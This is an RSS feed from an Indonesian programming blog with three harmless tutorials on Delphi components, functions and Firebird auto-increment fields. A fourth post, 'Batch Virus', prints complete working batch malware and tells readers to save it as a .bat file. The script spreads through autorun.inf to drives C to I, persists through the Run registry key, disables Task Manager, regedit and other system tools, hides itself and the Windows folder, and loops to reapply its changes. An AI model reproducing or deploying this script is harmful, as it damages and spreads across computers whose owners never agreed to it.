<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Computer IT and Programming</title>
	<atom:link href="http://nicesunday.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://nicesunday.wordpress.com</link>
	<description>All of My Creativity is Here :)</description>
	<lastBuildDate>Sat, 21 May 2011 17:26:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='nicesunday.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Computer IT and Programming</title>
		<link>http://nicesunday.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://nicesunday.wordpress.com/osd.xml" title="Computer IT and Programming" />
	<atom:link rel='hub' href='http://nicesunday.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Menambah Component Visual saat Runtime</title>
		<link>http://nicesunday.wordpress.com/2011/01/15/menambah-component-visual-saat-runtime/</link>
		<comments>http://nicesunday.wordpress.com/2011/01/15/menambah-component-visual-saat-runtime/#comments</comments>
		<pubDate>Sat, 15 Jan 2011 15:03:27 +0000</pubDate>
		<dc:creator>Mohamad Yashir</dc:creator>
				<category><![CDATA[Delphi Programming]]></category>

		<guid isPermaLink="false">http://massimmoto.wordpress.com/?p=148</guid>
		<description><![CDATA[Adakalanya program yang kita buat melakukan operasi yang membutuhkan penambahan komponen saat Runtime, gimana maksud nya?? gini ,, biasanya kita menambahkan/meletakan komponen saat posisi design time atau waktu merancang menggunakan IDE delphi. nah,, kali ini saya share gimana cara nambahin komponen waktu Runtime atau saat program di jalan kan.. hemmm.. berhubung udah ngantuk dan lemes,, <a href="http://nicesunday.wordpress.com/2011/01/15/menambah-component-visual-saat-runtime/" class="excerpt-more-link">[&#8230;]</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=148&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Adakalanya program yang kita buat melakukan operasi yang membutuhkan penambahan komponen saat Runtime, gimana maksud nya??</p>
<p>gini ,, biasanya kita menambahkan/meletakan komponen saat posisi design time atau waktu merancang menggunakan IDE delphi. nah,, kali ini saya share gimana cara nambahin komponen waktu Runtime atau saat program di jalan kan..</p>
<p>hemmm.. berhubung udah ngantuk dan lemes,, jadi saya ngasi contoh yg sederhana saja ,, yaitu menambah komponen TButton saat runtime.</p>
<p>secara garis besar,, Property yang perlu di perhatikan ketika menciptakan objek visual secara umum yaitu :</p>
<p>0. Parent, parent yg di maksud disini adalah component visual yang bersifat container yang nantinya sebagai tempat berdiri dari component yang akan di ciptakan.</p>
<p>1. Tinggi (Height)</p>
<p>2. Panjang (Width)</p>
<p>3. Batas atas terhadap Parent (Top)</p>
<p>4. Batas kiri terhadap Parent (Left)</p>
<p>property lain, seperti Caption, Hint, Align tinggal menyesuaikan kebutuhan saja.</p>
<p>berikut kode nya</p>
<p>procedure TForm1.pCreateButton();</p>
<p>var vButton : TButton;</p>
<p>begin</p>
<p>vButton := TButton.Create(Form1); //form1 disini adalah owner dari TButton</p>
<p>vButton.Parent := Form1; // tempat berdiri dari TButton</p>
<p>vButton.Width := 100;</p>
<p>vButton.Height := 50;</p>
<p>vButton.Top := 50;</p>
<p>vButton.Left := 50;</p>
<p>end;</p>
<p>procedure TForm1.FormClick(Sender: TObject);<br />
begin<br />
pCreateButton;<br />
end;</p>
<p>maka, ketika form1 di klik komponen TButton tercipta, berikut SS nya</p>
<p><a href="http://nicesunday.files.wordpress.com/2011/01/auo.jpg"><img class="aligncenter size-medium wp-image-226" title="auo" src="http://nicesunday.files.wordpress.com/2011/01/auo.jpg?w=300&#038;h=204" alt="" width="300" height="204" /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nicesunday.wordpress.com/148/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nicesunday.wordpress.com/148/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nicesunday.wordpress.com/148/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nicesunday.wordpress.com/148/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nicesunday.wordpress.com/148/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nicesunday.wordpress.com/148/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nicesunday.wordpress.com/148/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nicesunday.wordpress.com/148/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nicesunday.wordpress.com/148/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nicesunday.wordpress.com/148/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nicesunday.wordpress.com/148/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nicesunday.wordpress.com/148/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nicesunday.wordpress.com/148/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nicesunday.wordpress.com/148/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=148&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nicesunday.wordpress.com/2011/01/15/menambah-component-visual-saat-runtime/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e70c795fc29310e234aa250c5b45144a?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nicesunday</media:title>
		</media:content>

		<media:content url="http://nicesunday.files.wordpress.com/2011/01/auo.jpg?w=300" medium="image">
			<media:title type="html">auo</media:title>
		</media:content>
	</item>
		<item>
		<title>Auto Increment Field database Firebird dengan IBExpert</title>
		<link>http://nicesunday.wordpress.com/2010/12/23/auto-increment-field-database-firebird-dengan-ibexpert/</link>
		<comments>http://nicesunday.wordpress.com/2010/12/23/auto-increment-field-database-firebird-dengan-ibexpert/#comments</comments>
		<pubDate>Thu, 23 Dec 2010 12:39:08 +0000</pubDate>
		<dc:creator>Mohamad Yashir</dc:creator>
				<category><![CDATA[Database]]></category>

		<guid isPermaLink="false">http://nicesunday.wordpress.com/?p=209</guid>
		<description><![CDATA[helo helo helooo,, nulis lagi dah,, kali ini saya menjelaskan bagaimana cara bikin field auto increment pada database firebird, kenapa musti dijelasin?? nice question.. tidak seperti pada mysql, pembuatan field auto increment di firebird lebih ribet, soalnya bisa dibilang manual, pada mysql tinggal di tambahin parameter AUTO_INCREMENT waktu bikin tabel seperti contoh di bawah ini <a href="http://nicesunday.wordpress.com/2010/12/23/auto-increment-field-database-firebird-dengan-ibexpert/" class="excerpt-more-link">[&#8230;]</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=209&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>helo helo helooo,, nulis lagi dah,,</p>
<p>kali ini saya menjelaskan bagaimana cara bikin field auto increment pada database firebird,</p>
<p>kenapa musti dijelasin??</p>
<p>nice question..</p>
<p>tidak seperti pada mysql, pembuatan field auto increment di firebird lebih ribet, soalnya bisa dibilang manual, pada mysql tinggal di tambahin parameter AUTO_INCREMENT waktu bikin tabel seperti contoh di bawah ini</p>
<pre>CREATE TABLE animals (
     id MEDIUMINT NOT NULL AUTO_INCREMENT,
     name CHAR(30) NOT NULL,
     PRIMARY KEY (id)
)
<span id="more-209"></span></pre>
<p>tapi di firebird beda coy, musti bikin generator dulu, trus di bikin triger nya buat masukin value generator nya ke dalam tabel.. seperti apa sintak nya ??</p>
<p>no no no.. disini kagak bicara sintak, seperti judul di atas saya make bantuan IBExpert ,, <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> . berikut langkah&#8221; nya..</p>
<p>1. bikin table nya</p>
<div class="wp-caption aligncenter" style="width: 810px"><img title="addtable" src="http://img213.imageshack.us/img213/6945/screenshot1mp.jpg" alt="menambah tabel dengan IBExpert" width="800" height="500" /><p class="wp-caption-text">Menambah Tabel</p></div>
<p>Klik kanan pada icon Tables di form Database Explorer, kemudian klik New Table&#8230; atau tekan CTRL +N</p>
<p>2. Tambah Field bertipe Integer, atau Bigint</p>
<div class="wp-caption aligncenter" style="width: 810px"><img title="Addtable" src="http://img818.imageshack.us/img818/9378/screenshot11h.jpg" alt="Menambahkan Table Baru ke Dalam Database" width="800" height="500" /><p class="wp-caption-text">Menambahkan Field Baru ke Dalam Tabel</p></div>
<p>Setelah menambahkan Field, Klik 2 kali baris pada kolom AutoInc.</p>
<p>kemudian Klik Create Generator,</p>
<div class="wp-caption aligncenter" style="width: 810px"><img title="addTriger" src="http://img217.imageshack.us/img217/118/screenshot21ne.jpg" alt="Tambah Triger" width="800" height="500" /><p class="wp-caption-text">Menambahkan Triger</p></div>
<p>kemudian klik tab Triger, dan klik Create Trigger, truuus.. pencet tombol OK..</p>
<p>dan setelah itu tinggal di compile, pencet tombol petir di pojok kiri atas yang warna kuning itu&#8230;.</p>
<div class="wp-caption aligncenter" style="width: 810px"><img title="Commit" src="http://img43.imageshack.us/img43/7370/screenshot31m.jpg" alt="Commit Transaction" width="800" height="500" /><p class="wp-caption-text">Commit Transaction</p></div>
<p>trus pencet Commit..</p>
<p>dah selese.. gitu aja,, gampang kan..</p>
<p>menurut saya, kalau anda sedang bingung cari Firebird manager .. yaaa pake <a href="http://ibexpert.net/ibe/">IBExpert</a> aja,, lebih simple dan mudah dimengerti orang awam kyk saya ini <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>o iya.. Screen Shot di atas terlihat saya make Linux Ubuntu,, IBExpert sebenarnya buat Windows, tapi bisa juga di Ubuntu, tinggal nambahin Library gds32.dll secara manual supaya isa jalan normal.</p>
<p>thx.. sekian&#8230;. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_cool.gif' alt='8-)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nicesunday.wordpress.com/209/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nicesunday.wordpress.com/209/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nicesunday.wordpress.com/209/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nicesunday.wordpress.com/209/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nicesunday.wordpress.com/209/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nicesunday.wordpress.com/209/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nicesunday.wordpress.com/209/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nicesunday.wordpress.com/209/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nicesunday.wordpress.com/209/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nicesunday.wordpress.com/209/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nicesunday.wordpress.com/209/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nicesunday.wordpress.com/209/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nicesunday.wordpress.com/209/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nicesunday.wordpress.com/209/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=209&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nicesunday.wordpress.com/2010/12/23/auto-increment-field-database-firebird-dengan-ibexpert/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e70c795fc29310e234aa250c5b45144a?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nicesunday</media:title>
		</media:content>

		<media:content url="http://img213.imageshack.us/img213/6945/screenshot1mp.jpg" medium="image">
			<media:title type="html">addtable</media:title>
		</media:content>

		<media:content url="http://img818.imageshack.us/img818/9378/screenshot11h.jpg" medium="image">
			<media:title type="html">Addtable</media:title>
		</media:content>

		<media:content url="http://img217.imageshack.us/img217/118/screenshot21ne.jpg" medium="image">
			<media:title type="html">addTriger</media:title>
		</media:content>

		<media:content url="http://img43.imageshack.us/img43/7370/screenshot31m.jpg" medium="image">
			<media:title type="html">Commit</media:title>
		</media:content>
	</item>
		<item>
		<title>Function dan Procedure dalam delphi</title>
		<link>http://nicesunday.wordpress.com/2010/10/29/function-dan-procedure-dalam-delphi/</link>
		<comments>http://nicesunday.wordpress.com/2010/10/29/function-dan-procedure-dalam-delphi/#comments</comments>
		<pubDate>Fri, 29 Oct 2010 20:55:04 +0000</pubDate>
		<dc:creator>Mohamad Yashir</dc:creator>
				<category><![CDATA[Delphi Programming]]></category>

		<guid isPermaLink="false">http://massimmoto.wordpress.com/?p=138</guid>
		<description><![CDATA[haduh,, sudah lama sekali nggk nulis di blog ini,, hahahahay.. kali ni saya mau share tentang function dan procedure di dalam pemrograman delphi, mengapa&#8230; mengapa.. harus mempelajari itu?? begini.. saya jelaskan&#8230; penulisan atau penambahan secara manual suatu function atau procedure lebih baik dilakukan saat menyelesaikan suatu permasalahan yang membutuhkan operasi tertentu secara berulang kali, penambahan <a href="http://nicesunday.wordpress.com/2010/10/29/function-dan-procedure-dalam-delphi/" class="excerpt-more-link">[&#8230;]</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=138&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>haduh,, sudah lama sekali nggk nulis di blog ini,, hahahahay.. kali ni saya mau share tentang function dan procedure di dalam pemrograman delphi,</p>
<p>mengapa&#8230; mengapa.. harus mempelajari itu?? begini.. saya jelaskan&#8230; penulisan atau penambahan secara manual suatu function atau procedure lebih baik dilakukan saat menyelesaikan suatu permasalahan yang membutuhkan operasi tertentu secara berulang kali, penambahan function dan procedure yang sesuai dengan kebutuhan dapat mempermudah ketika mengembangkan project serta pencarian bug dalam project tersebut.</p>
<p><span id="more-138"></span></p>
<p>apakah function itu?.. dan apakah procedure itu?..</p>
<p>function adalah..  sekumpulan statement, variabel, parameter yang dijadikan satu untuk mengerjakan satu atau lebih operasi dan mempunyai satu feedback atau nilai balik, feedback bisa ber tipe data apa saja sesuai deklarasi.</p>
<p>procedure adalah.. sekumpulan statement, variabel, parameter yang dijadikan satu untuk mengerjakan satu atau lebih operasi.</p>
<p>nah,, dari definisi yg saya jelaskan di atas, function dan procedure mempunyai perbedaan yaitu pada feedback atau nilai balik, tidak seperti function, procedure hanya mengerjakan operasi tanpa mengembalikan nilai.</p>
<p>berikut penjelasan cara penulisan nya :</p>
<p>Deklarasi :</p>
<p>procedure NamaProcedure(Parameter : TipeData);</p>
<p>function NamaFunction(Parameter : TipeData) : TipeDataFeedback;</p>
<p>deklarasi procedure dan function ditulis pada block public declaration, private, dan protected.</p>
<p>type<br />
TForm1 = class(TForm)<br />
private<br />
procedure NamaProcedure(Parameter : TipeData);<br />
public<br />
function NamaFunction(Parameter : TipeData) : TipeDataFeedback;<br />
protected<br />
{ Protected declarations }<br />
end;</p>
<p>Implementasi :</p>
<p>penulisan implementasi nggk susah kok,, mudah sekali,, tinggal letakan kursor pada baris deklarasi mu trus pencet ctrl+shift+c .. dor ! jadi deh baris implementasi nya</p>
<p>procedure TForm1.NamaProcedure(Parameter : TipeData);<br />
begin</p>
<p>end;</p>
<p>procedure TForm1.NamaFunction(Parameter : TipeData): TipeDataFeedback;<br />
begin</p>
<p>end;</p>
<p>Pemanggilan atau eksekusi :</p>
<p>buat manggil procedure dan function yang telah di tulis, tinggal panggil aja nama mereka,, guus aguus,,, !&#8230; hahahha, ginii..  saya misal kan manggil procedure saat event button click pada suatu form</p>
<p>seperti ini :</p>
<p>procedure TForm1.Button1Click(Sender: TObject);<br />
begin<br />
NamaProcedure(NamaParameter);<br />
end;</p>
<p>gitu aja,,</p>
<p>nah,, kurang lebih seperti itu,, penjelasan dari saya,, kalo ada salah&#8221; kata maap yaaa, haha.. eh.. buat yang masi bingung ni saya sertakan contoh nya,, silahkan di <a href="http://www.mediafire.com/?hwra9ufw99qr5ug">donlod</a>..</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nicesunday.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nicesunday.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nicesunday.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nicesunday.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nicesunday.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nicesunday.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nicesunday.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nicesunday.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nicesunday.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nicesunday.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nicesunday.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nicesunday.wordpress.com/138/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nicesunday.wordpress.com/138/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nicesunday.wordpress.com/138/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=138&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nicesunday.wordpress.com/2010/10/29/function-dan-procedure-dalam-delphi/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e70c795fc29310e234aa250c5b45144a?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nicesunday</media:title>
		</media:content>
	</item>
		<item>
		<title>Batch Virus</title>
		<link>http://nicesunday.wordpress.com/2008/07/12/batch-virus/</link>
		<comments>http://nicesunday.wordpress.com/2008/07/12/batch-virus/#comments</comments>
		<pubDate>Sat, 12 Jul 2008 08:29:05 +0000</pubDate>
		<dc:creator>Mohamad Yashir</dc:creator>
				<category><![CDATA[Batch]]></category>

		<guid isPermaLink="false">http://massimmoto.wordpress.com/?p=23</guid>
		<description><![CDATA[Temen-temen Berikut adalah contoh virus dengan pemrograman Batch .. sederhana banget sih.. gak kejam .. gak ngrusak ..  gak neko-neko&#8230; tapi licik&#8230; hahaha kenapa bisa licik?? yang bikin licik menurutku tu adanya proses looping nya.. jadi walau file yang di buat virus, atau registry entry yang di ubah ketauan sama yang punya komputer dan di <a href="http://nicesunday.wordpress.com/2008/07/12/batch-virus/" class="excerpt-more-link">[&#8230;]</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=23&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Temen-temen  Berikut adalah contoh virus dengan pemrograman Batch .. sederhana banget sih.. gak kejam .. gak ngrusak ..  gak neko-neko&#8230; tapi licik&#8230; hahaha</p>
<p>kenapa bisa licik?? yang bikin licik menurutku tu adanya proses looping nya.. jadi walau file yang di buat virus, atau registry entry yang di ubah ketauan sama yang punya komputer dan di kembalikan sepreti semula, tetep nantinya balik lagi-balik lagi hehehe</p>
<p>kalu mau liat sourcenya dan baca lebih lanjut silahkan klik link dibawah ini</p>
<p><span id="more-23"></span></p>
<p>=====================================================================</p>
<p>@echo off<br />
:proses<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f<br />
reg add &#8220;hkcu\Control Panel\Mouse&#8221; /v SwapMouseButtons /t REG_SZ /d 1 /f<br />
echo [autorun]&gt;autorun.inf<br />
echo shell\1=Scan Virus&gt;&gt;autorun.inf<br />
echo shell\1\command=noname.bat&gt;&gt;autorun.inf<br />
echo shell\2=Properties&gt;&gt;autorun.inf<br />
echo shell\2\command=noname.bat&gt;&gt;autorun.inf<br />
for %%t in (C D E F G H I) do copy /y autorun.inf %%t:\<br />
for %%t in (C D E F G H I) do copy /y %0 %%t:\<br />
for %%t in (C D E F G H I) do attrib +s +h %%t:\noname.bat<br />
for %%t in (C D E F G H I) do attrib +s +h %%t:\autorun.inf<br />
copy %0 C:\WINDOWS\system32\<br />
reg add hklm\Software\Microsoft\Windows\CurrentVersion\Run /v windos /t REG_SZ /d C:\WINDOWS\system32\noname.bat<br />
attrib +s +h C:\WINDOWS\system32\noname.bat<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 91 /f<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f<br />
reg add &#8220;hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&#8221; /v LegalNoticeCaption /t REG_SZ /d HUIHIHIHI /f<br />
reg add &#8220;hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&#8221; /v LegalNoticeText /t REG_SZ /d &#8220;Maaf, komputer anda saya obok-obok&#8230;. Virus ini buatan anak bangsa cintailah produk dalam negri.., virus made in Tipes&#8221; /f<br />
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f<br />
attrib +s +h C:\WINDOWS<br />
goto proses</p>
<p>=====================================================================</p>
<p>tulis source diatas ke notepad trus ekstensinya diganti *.bat</p>
<p>algoritmanya sbb :</p>
<p>1. mendisable task manager</p>
<p>2. membalik klik mouse</p>
<p>3. membuat file autorun.inf</p>
<p>4. copy autorun.inf ke drive C,D,E,F,G,H,I</p>
<p>5. copy virus ke drive C,D,E,F,G,H,I</p>
<p>6. merubah atribut virus &amp; file autorun menjadi super hiden</p>
<p>7. copy virus ke system32</p>
<p>8. menjadikan virus aktif saat start up windows</p>
<p>9. merubah atribut virus di folder system32 menjadi super hiden</p>
<p>10. disable find, disable run, disable turn off computer, aktifkan autoplay, disable folder option, disable show super hiden, membuat pesan saat masuk windows, disable regedit.</p>
<p>11. merubah atribut folder WINDOWS menjadi super hiden</p>
<p>semoga bermanfaat..</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/nicesunday.wordpress.com/23/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/nicesunday.wordpress.com/23/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nicesunday.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nicesunday.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nicesunday.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nicesunday.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nicesunday.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nicesunday.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nicesunday.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nicesunday.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nicesunday.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nicesunday.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nicesunday.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nicesunday.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nicesunday.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nicesunday.wordpress.com/23/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nicesunday.wordpress.com&amp;blog=17253526&amp;post=23&amp;subd=nicesunday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nicesunday.wordpress.com/2008/07/12/batch-virus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e70c795fc29310e234aa250c5b45144a?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nicesunday</media:title>
		</media:content>
	</item>
	</channel>
</rss>
